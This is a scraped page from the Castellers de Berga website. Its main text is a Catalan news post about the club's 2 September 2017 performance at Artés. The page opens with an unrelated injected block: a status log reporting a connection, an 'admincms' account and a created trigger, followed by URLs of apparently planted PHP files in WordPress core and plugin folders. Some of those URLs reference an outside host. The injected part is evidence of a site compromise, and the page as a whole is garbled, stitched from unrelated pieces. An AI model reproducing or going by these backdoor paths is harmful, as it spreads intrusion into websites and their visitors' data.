Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?private https://castellersdeberga.cat/wp-admin/network/theme-install-ajax-core-private-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ssh2-ajax-response-ajax-response-cron.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/update-ajax-response-private-cron-wp-ajax-response-meta.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-private-cron-wp-core-cron-core-wp-private.php https://castellersdeberga.cat/wp-content/plugins/event-tickets/event-tickets-private-ajax-response-core-ajax-wp-stream-stream-cron.php https://castellersdeberga.cat/wp-includes/blocks/image-meta-meta-ajax.php https://castellersdeberga.cat/wp-includes/ID3/module.audio-video.matroska-ajax-response-ajax-core-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Actuació a Artés
 

Actuació a Artés


Actuació a ArtésAquest dissabte 2 de setembre de 2017, hem actuat a la Festa Major d’Artés. Ho hem fet a la Plaça Fabra, acompanyats dels Picapolls de la Gavarresa i els Matossers de Molins de Rei. No era la primera vegada que actuàvem a Artés, ja ho vam fer el 31 d’agost de 2013, aquella vegada amb els Salats de Súria i els Carallots de Sant Vicenç dels Horts.
A la població del Bages hi hem descarregat el 4 de 6, el 3 de 7 i el 3 de 6 amb agulla, més un pilar de 4 a l’inici i un altre al final. Amb aquesta actuació, pugem un graó més i tornem als castells de 7 pisos, després de les vacances. I ho fem amb un 3 de 7 molt alleugerit, traient quilos als pisos de segons, terços i quarts.
Els amfitrions, els Picapolls de la Gavarresa han signat una bona actuació, amb el 5 de 6, com el millor dels seus 3 castells. Els Matossers de Molins de Rei només han pogut descarregar el 3 i el 4 de 6 i no han pogut completar el tercer castell.
Seguim amb els assajos de dimarts i divendres, al Cine Catalunya. Dissabte 9 de setembre, finalitzarem el projecte “Les 7 meravelles del Berguedà”. I dilluns 11 de setembre serem a la manifestació de l’11 de setembre, a Barcelona.